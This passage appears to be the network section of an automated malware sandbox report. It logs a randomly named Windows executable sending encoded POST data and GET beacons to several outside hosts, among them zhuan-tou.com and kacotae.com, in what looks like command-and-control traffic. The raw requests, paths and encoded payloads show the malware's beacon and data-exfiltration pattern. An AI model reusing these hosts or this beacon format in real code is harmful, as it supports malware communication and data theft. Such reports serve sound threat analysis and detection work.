                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 6b 6f 30 38 36 33 41 52 33 2f 5a 34 37 67 6a 44 36 42 77 76 4b 55 41 52 46 39 65 2f 62 6b 4d 41 54 73 59 53 61 76 70 6a 7a 2b 56 61 45 48 57 7a 46 44 41 32 73 44 36 44 63 6d 61 53 6b 67 6d 65 49 73 73 7a 47 73 5a 49 51 33 52 48 6b 4c 69 64 49 36 41 37 52 4c 54 50 6e 57 5a 76 50 57 64 75 78 6b 79 79 33 33 42 74 56 64 62 57 4b 6d 67 58 6d 72 34 35 4a 56 30 74 43 67 32 2f 70 48 57 50 70 78 4f 71 58 56 63 53 5a 34 30 51 43 37 43 4f 68 35 35 58 63 33 33 47 30 34 6d 2b 48 48 30 58 4f 78 31 55 4a 66 2b 6e 4a 42 36 68 32 68 66 4c 42 47 34 6d 51 6c 66 58 7a 38 51 3d
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5ko0863AR3/Z47gjD6BwvKUARF9e/bkMATsYSavpjz+VaEHWzFDA2sD6DcmaSkgmeIsszGsZIQ3RHkLidI6A7RLTPnWZvPWduxkyy33BtVdbWKmgXmr45JV0tCg2/pHWPpxOqXVcSZ40QC7COh55Xc33G04m+HH0XOx1UJf+nJB6h2hfLBG4mQlfXz8Q=


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      42192.168.2.551408103.120.80.111802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:28.461127043 CEST737OUTPOST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 2b 49 45 38 38 57 41 52 31 66 5a 35 2b 67 6a 44 77 68 77 7a 4b 55 4d 52 46 35 50 67 62 79 55 41 54 4d 6f 53 64 75 70 6a 67 4f 56 61 63 58 57 32 4c 6a 41 35 73 44 2f 30 63 6e 6d 53 6b 6b 32 65 49 70 51 7a 48 66 68 4c 43 33 52 46 73 72 69 66 46 61 41 37 52 4c 54 50 6e 57 4e 42 50 57 46 75 77 56 43 79 32 54 56 69 57 64 62 52 4e 6d 67 58 77 62 34 39 4a 56 31 4b 43 69 53 46 70 46 2b 50 70 30 79 71 58 45 63 64 51 34 30 53 47 37 44 57 70 35 52 59 62 33 6a 70 72 62 6e 6e 47 46 38 70 43 6e 59 2b 54 39 32 50 61 68 57 5a 6d 79 58 38 51 32 5a 50 4b 47 50 6e 74 72 45 36 61 37 4a 7a 53 36 51 55 65 41 4f 71 34 2f 5a 73 31 4a 6b 61
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbyUATMoSdupjgOVacXW2LjA5sD/0cnmSkk2eIpQzHfhLC3RFsrifFaA7RLTPnWNBPWFuwVCy2TViWdbRNmgXwb49JV1KCiSFpF+Pp0yqXEcdQ40SG7DWp5RYb3jprbnnGF8pCnY+T92PahWZmyX8Q2ZPKGPntrE6a7JzS6QUeAOq4/Zs1Jka


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      43192.168.2.551409103.120.80.111802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:31.120219946 CEST1754OUTPOST /lx5p/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.zhuan-tou.com
                                      Referer: http://www.zhuan-tou.com/lx5p/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 68 77 61 4c 2b 75 56 32 6d 35 4c 35 2b 49 45 38 38 57 41 52 31 66 5a 35 2b 67 6a 44 77 68 77 7a 4b 55 4d 52 46 35 50 67 62 79 63 41 53 2b 67 53 64 4e 42 6a 78 2b 56 61 56 33 57 33 4c 6a 41 67 73 44 48 34 63 6e 72 70 6b 6d 2b 65 4c 50 6b 7a 41 75 68 4c 59 6e 52 46 67 4c 69 65 49 36 41 71 52 4c 44 4c 6e 57 64 42 50 57 46 75 77 57 61 79 79 48 42 69 51 64 62 57 4b 6d 67 4c 6d 72 35 61 4a 56 39 77 43 69 47 56 70 30 65 50 71 55 43 71 57 32 30 64 4d 6f 30 55 49 62 44 46 70 35 4d 59 62 32 50 50 72 59 37 4e 47 48 73 70 47 42 31 2f 4f 75 75 57 50 78 65 4b 6b 52 72 57 47 52 52 63 54 41 58 74 71 37 63 70 47 49 56 71 48 39 64 55 54 30 33 59 75 2b 68 39 36 4e 56 6f 2f 36 43 38 74 34 33 2f 76 62 56 42 59 6a 52 72 36 7a 53 52 64 76 6c 4c 32 68 54 70 56 32 72 6e 57 30 4c 7a 4a 6b 31 4d 4a 76 32 38 36 71 57 53 6c 7a 2f 52 55 68 4f 53 62 43 4d 67 74 47 30 75 47 4e 39 51 36 76 69 63 66 44 35 4c 63 46 4f 54 65 62 68 70 76 32 79 35 75 55 31 78 48 48 76 68 30 43 42 44 44 6d 42 54 36 68 44 67 56 74 [TRUNCATED]
                                      Data Ascii: TTv82Lg=hwaL+uV2m5L5+IE88WAR1fZ5+gjDwhwzKUMRF5PgbycAS+gSdNBjx+VaV3W3LjAgsDH4cnrpkm+eLPkzAuhLYnRFgLieI6AqRLDLnWdBPWFuwWayyHBiQdbWKmgLmr5aJV9wCiGVp0ePqUCqW20dMo0UIbDFp5MYb2PPrY7NGHspGB1/OuuWPxeKkRrWGRRcTAXtq7cpGIVqH9dUT03Yu+h96NVo/6C8t43/vbVBYjRr6zSRdvlL2hTpV2rnW0LzJk1MJv286qWSlz/RUhOSbCMgtG0uGN9Q6vicfD5LcFOTebhpv2y5uU1xHHvh0CBDDmBT6hDgVtV3bqL0GdMshe7FHv7Bgt6bqU6UxSRdmpSEBIuUx9PeBxCJJzVXIauxUcWeBs+N3HDzS78jKZVUYioOMAZM1s7ZAb5Yl0BnFI79Tm9xda+pkr+jlfnZpC0jrL1gNYsFfVrPFWkqcsL1DeksQ+X85fkcBc0i7w/iOh+NlNCkXVLPHgi2oOms6jq9MUHAPxjV2UEpNXaB7hEDk+cYg33zZPErvC3XmeZCj9BBj646QfctoD1DBEcb0PrZtzIJLEJyPQwkOFPqQbkKzAUJmOJqkeeIx5afJVKYhnJjeY4PtrgCng4zaRbjnUkVVbfr6WuDEsxnQvTQdF1TNPN6YhnbK2n8Etg18S1jxmkiwcp6fRKDUKfvI9zCrWk6w28vvlONDZyKLmoWiETzSLJnJ6bfSXNSbbMl5XzfbLVF6LpxhKWsnd1To5dIkERvL0fqtGXSRYrSOfkGCnulaCQN8P27ykxi7ntJWigb00ntMSMYds8oa6JEVAhXYillLaBh6KZkq/r94BhqunBrreL7xRHwXslixVrmAza/TomsF+MVC+24gyV0zuyCbnlD5MilBROz+B1cS4h64VT2UeeO8b44kvukI1sd/NX3vH9PC4kOOoQ9XHsrFUG50IX4YCVCNTvNOh2pb3yTZcMNHyEm+y+QPAlg7a/lCEEl9fpQ [TRUNCATED]


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      44192.168.2.551410103.120.80.111802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:33.648906946 CEST456OUTGET /lx5p/?TTv82Lg=syyr9ehUh5Dik7pm/3o58LEiuz6t5Qsxa3AqbpTiKXwTN4MFTP1/ruYiG066Pw0RpEGKYU+Xmw7DJuAgJs5fVEIr+ru5VK8zeO7ugFBDIhF/xAum4x9tUt/OQm4f5IJVQQ==&kH=00U8ENLHk HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.zhuan-tou.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:34.623193026 CEST1236INHTTP/1.1 200 OK
                                      Server: wts/1.7.0
                                      Date: Mon, 10 Jun 2024 08:23:44 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      ETag: "65517fce-1a10"
                                      Data Raw: 31 61 32 39 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 7a 68 75 61 6e 2d 74 6f 75 2e 63 6f 6d 2d d5 fd d4 da ce f7 b2 bf ca fd c2 eb 28 77 77 77 2e 77 65 73 74 2e 63 6e 29 bd f8 d0 d0 bd bb d2 d7 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 75 61 6e 2d 74 6f 75 2e 63 6f 6d 2c 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 [TRUNCATED]
                                      Data Ascii: 1a29<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>zhuan-tou.com-(www.west.cn)</title> <meta name="description" content="zhuan-tou.com," /> <meta name="keywords" content="zhuan-tou.com," /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <style> body { line-height: 1.6; background-color: #fff; } body, th, td, button, input, select, textarea { font-family: "Microsoft Yahei", "Hiragino Sans GB", "Helvetica Neue", Helvetica, tahoma, arial, Verdana, sans-serif, "WenQuanYi Micro Hei", "\5B8B\4F53"; font-size: 12px; color: #666; -webkit-font-smoothing: antialiased; -moz-font-smoothing: antialiased; } [TRUNCATED]
                                      Jun 10, 2024 10:23:34.623224020 CEST1236INData Raw: 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 68 74 6d 6c 2c 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 0d 0a 20
                                      Data Ascii: { height: 100%; } html, body, h1, h2, h3, h4, h5, h6, hr, p, iframe, dl, dt, dd,
                                      Jun 10, 2024 10:23:34.623235941 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 6f 72 61 6e 67 65 62 74 6e 3a 68 6f 76 65 72 20 7b 0d 0a 20 20 20 20 20 20
                                      Data Ascii: margin-top: 20px } .orangebtn:hover { color: #fff; background-color: #f16600; } .banner1 h1 { font-size: 48px; color: #feff07;
                                      Jun 10, 2024 10:23:34.623245001 CEST1236INData Raw: 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 72 69 67 68 74 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d
                                      Data Ascii: font-size: 24px } .right { background-color: #2780d9; height: 100%; width: 320px; position: absolute; right: 50px; top: 0;
                                      Jun 10, 2024 10:23:34.623255968 CEST1236INData Raw: 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20
                                      Data Ascii: .footer-link span { padding: 0 6px; } </style></head><body> <div class="banner-out"> <div class="banner1"> <div class="wrap"> <h1>zhuan-tou.com</h1>
                                      Jun 10, 2024 10:23:34.623269081 CEST723INData Raw: 2f 73 65 72 76 69 63 65 73 2f 6d 61 69 6c 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e c6 f3 d2 b5 d3 ca cf e4 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d
                                      Data Ascii: /services/mail/" target="_blank"></a> </div> </div> </div> <script> $(function() { $('#J_footerLink a').click(function() { var href = $(this).attr('href');


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      45192.168.2.55141164.226.69.42802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:39.857172012 CEST711OUTPOST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 208
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 77 56 73 43 41 73 6e 36 68 59 62 76 4c 74 75 79 36 6b 31 69 33 4d 59 67 4f 70 55 35 59 6d 52 6b 2b 2f 34 34 36 6f 49 50 58 35 2f 4e 31 79 43 6d 5a 32 4a 4c 36 76 38 45 48 46 4f 56 42 71 44 68 63 34 32 54 64 7a 32 55 6b 42 7a 62 5a 68 44 57 68 34 33 42 57 43 73 68 63 79 62 55 6f 43 42 39 6a 65 56 5a 4e 50 51 4f 6b 45 70 7a 4b 65 68 48 50 6e 66 53 35 41 47 76 6d 65 54 55 47 62 66 41 58 62 78 32 2f 71 58 33 4e 34 55 6c 44 42 76 44 62 78 65 48 4e 66 34 44 74 73 63 61 2f 30 5a 6c 61 51 44 4e 74 73 49 59 2b 4d 4b 38 4c 66 55 71 2f 32 64 41 30 35 4a 57 77 6f 3d
                                      Data Ascii: TTv82Lg=ETMruwulvEv7vwVsCAsn6hYbvLtuy6k1i3MYgOpU5YmRk+/446oIPX5/N1yCmZ2JL6v8EHFOVBqDhc42Tdz2UkBzbZhDWh43BWCshcybUoCB9jeVZNPQOkEpzKehHPnfS5AGvmeTUGbfAXbx2/qX3N4UlDBvDbxeHNf4Dtsca/0ZlaQDNtsIY+MK8LfUq/2dA05JWwo=
                                      Jun 10, 2024 10:23:40.669893980 CEST300INHTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:40 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      46192.168.2.55141264.226.69.42802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:42.389539957 CEST731OUTPOST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 228
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 51 46 73 45 6a 45 6e 74 52 59 63 68 72 74 75 72 71 6b 35 69 33 51 59 67 4b 5a 39 36 72 53 52 71 2f 50 34 35 37 6f 49 66 48 35 2f 48 56 7a 4a 37 4a 32 47 4c 36 7a 30 45 43 46 4f 56 42 57 44 68 65 77 32 54 75 4c 35 58 55 42 31 55 35 68 42 4c 78 34 33 42 57 43 73 68 63 57 78 55 70 6d 42 39 53 75 56 62 76 6e 54 51 55 45 71 30 4b 65 68 55 66 6e 62 53 35 41 30 76 6b 71 39 55 41 66 66 41 56 7a 78 34 4e 53 51 67 39 34 57 6f 6a 41 52 54 35 34 48 4b 4d 66 34 47 4f 56 38 4e 4f 63 30 67 73 39 70 58 50 6b 67 4c 65 67 79 73 59 58 6a 37 50 58 30 61 58 70 35 49 6e 39 39 50 31 48 41 6c 43 62 51 77 64 41 7a 34 4f 78 76 6d 63 6c 66
                                      Data Ascii: TTv82Lg=ETMruwulvEv7vQFsEjEntRYchrturqk5i3QYgKZ96rSRq/P457oIfH5/HVzJ7J2GL6z0ECFOVBWDhew2TuL5XUB1U5hBLx43BWCshcWxUpmB9SuVbvnTQUEq0KehUfnbS5A0vkq9UAffAVzx4NSQg94WojART54HKMf4GOV8NOc0gs9pXPkgLegysYXj7PX0aXp5In99P1HAlCbQwdAz4Oxvmclf
                                      Jun 10, 2024 10:23:43.211040020 CEST300INHTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:43 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      47192.168.2.55141364.226.69.42802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:44.929532051 CEST1748OUTPOST /1134/ HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Content-Length: 1244
                                      Cache-Control: no-cache
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Origin: http://www.kacotae.com
                                      Referer: http://www.kacotae.com/1134/
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Data Raw: 54 54 76 38 32 4c 67 3d 45 54 4d 72 75 77 75 6c 76 45 76 37 76 51 46 73 45 6a 45 6e 74 52 59 63 68 72 74 75 72 71 6b 35 69 33 51 59 67 4b 5a 39 36 72 4b 52 71 4e 33 34 37 59 41 49 63 48 35 2f 4c 31 79 4f 37 4a 32 68 4c 36 72 77 45 43 35 42 56 45 61 44 67 38 49 32 62 2f 4c 35 4d 6b 42 31 4d 35 68 41 57 68 34 75 42 57 53 57 68 63 47 78 55 70 6d 42 39 52 32 56 66 39 50 54 53 55 45 70 7a 4b 65 54 48 50 6e 2f 53 35 5a 44 76 6e 47 44 54 77 2f 66 46 46 44 78 31 59 47 51 69 64 34 51 76 6a 41 5a 54 35 6b 69 4b 4d 44 4f 47 50 78 61 4e 4e 4d 30 6a 39 41 65 4d 50 6f 6d 58 49 77 6c 75 2f 66 38 70 71 62 47 61 57 39 38 4c 30 64 59 47 31 75 76 6f 32 76 32 33 4d 6c 6d 67 71 39 43 72 5a 34 30 41 4b 78 47 34 71 4e 43 79 74 56 34 43 2b 42 69 70 76 50 41 67 64 77 6e 7a 73 68 34 6e 47 6a 64 48 75 4a 53 69 76 45 6e 6f 43 54 56 4e 46 37 33 63 7a 6b 72 45 52 64 63 6d 57 38 38 74 2f 64 6f 79 31 6b 75 4d 34 37 4b 47 4f 6e 56 4d 4c 6f 79 57 36 35 47 53 7a 4a 70 78 4f 56 2f 6b 74 47 61 46 6f 2b 31 6a 31 30 4d 4b 65 33 6a 4e 31 [TRUNCATED]
                                      Data Ascii: TTv82Lg=ETMruwulvEv7vQFsEjEntRYchrturqk5i3QYgKZ96rKRqN347YAIcH5/L1yO7J2hL6rwEC5BVEaDg8I2b/L5MkB1M5hAWh4uBWSWhcGxUpmB9R2Vf9PTSUEpzKeTHPn/S5ZDvnGDTw/fFFDx1YGQid4QvjAZT5kiKMDOGPxaNNM0j9AeMPomXIwlu/f8pqbGaW98L0dYG1uvo2v23Mlmgq9CrZ40AKxG4qNCytV4C+BipvPAgdwnzsh4nGjdHuJSivEnoCTVNF73czkrERdcmW88t/doy1kuM47KGOnVMLoyW65GSzJpxOV/ktGaFo+1j10MKe3jN1K3zsJh0X80V6U37Gv8vZbddJJeSGnD4xrOVfXd+Zwl+PBREtKT0yY2MBWuyRE4Uqfe9hISIrAkG4LnCvN8Wu5cr5e02f47+3f46dHHWNtZlRnVW9A+PUbsMq0yw2iYAuc7CFaItUDXRKvUWsdaov2PKTNiDU0o84FW6a/BC2SObvjUNY0pE5cc1iyaGmRaJyeNGbReN/2+dnbwQnls4XtY+BkqHtEExfo/0AqllM67b/1U7iF+LZa4X2l3bZYaMvdStdcQSwUh1Z5rsy04PIovcyX4Dgm7Vre37PFHHfY9Y978WkFkyxgfnDu+zl8QFxulz8pgbcK3VPMWel6tCxXkgvqeq7XqT1ECi/B5JaaqHvUVWcE8OTThB8cLWNkZw8b8EgNF5Dgq1VSw38p+Fq6CONyFBi4gxRMffCkXIvJjWBNij9p7sVpsvMIo6BE4yGFT8guADB1NDiB/I9fH70XqBXENil+AFeIOOiY3Fw4FdijUcISuj2bgfmHMQ0MzGgSl/UM/eMXG5EVAvno2IlcfxVfZFZWnHumqhaf65mK2uOP9ayKtY2f0GcCBWjQ6j2556gmdsWljCJATwzmYPXdrjgz2gefb3rJA5xZtjoigR7yUmR0IPGd70401lIES2i0gtXyhuQBusbGGtHEJLvJL/cRwwN/3SDku [TRUNCATED]
                                      Jun 10, 2024 10:23:45.764549017 CEST300INHTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:45 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Content-Encoding: gzip
                                      Data Raw: 36 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 f9 05 a9 79 45 a9 c5 25 95 c8 f2 fa 30 13 f5 a1 ae 01 00 74 63 0c ac 96 00 00 00 0d 0a 30 0d 0a 0d 0a
                                      Data Ascii: 6f(HML),I310Q/Qp/K&T$dCAfAyyE%0tc0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      48192.168.2.55141464.226.69.42802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:47.463475943 CEST454OUTGET /1134/?kH=00U8ENLHk&TTv82Lg=JRkLtFSsjC7w4kQ+Hghs1xAb5q91nLV93kknhelN5q6byYvj/Lx1HFkRT0D1h5CmR4/eZjEjURe15+EWWNTABSUQK+lvVBorOgW9ps6acI3n3nS9RerGGmYjuLu9ItylLw== HTTP/1.1
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Host: www.kacotae.com
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
                                      Jun 10, 2024 10:23:48.285732031 CEST297INHTTP/1.1 404 Not Found
                                      Server: openresty
                                      Date: Mon, 10 Jun 2024 08:23:48 GMT
                                      Content-Type: text/html
                                      Content-Length: 150
                                      Connection: close
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      49192.168.2.5514153.64.163.50802608C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 10, 2024 10:23:53.449083090 CEST726OUTPOST /fhu0/ HTTP/1.1
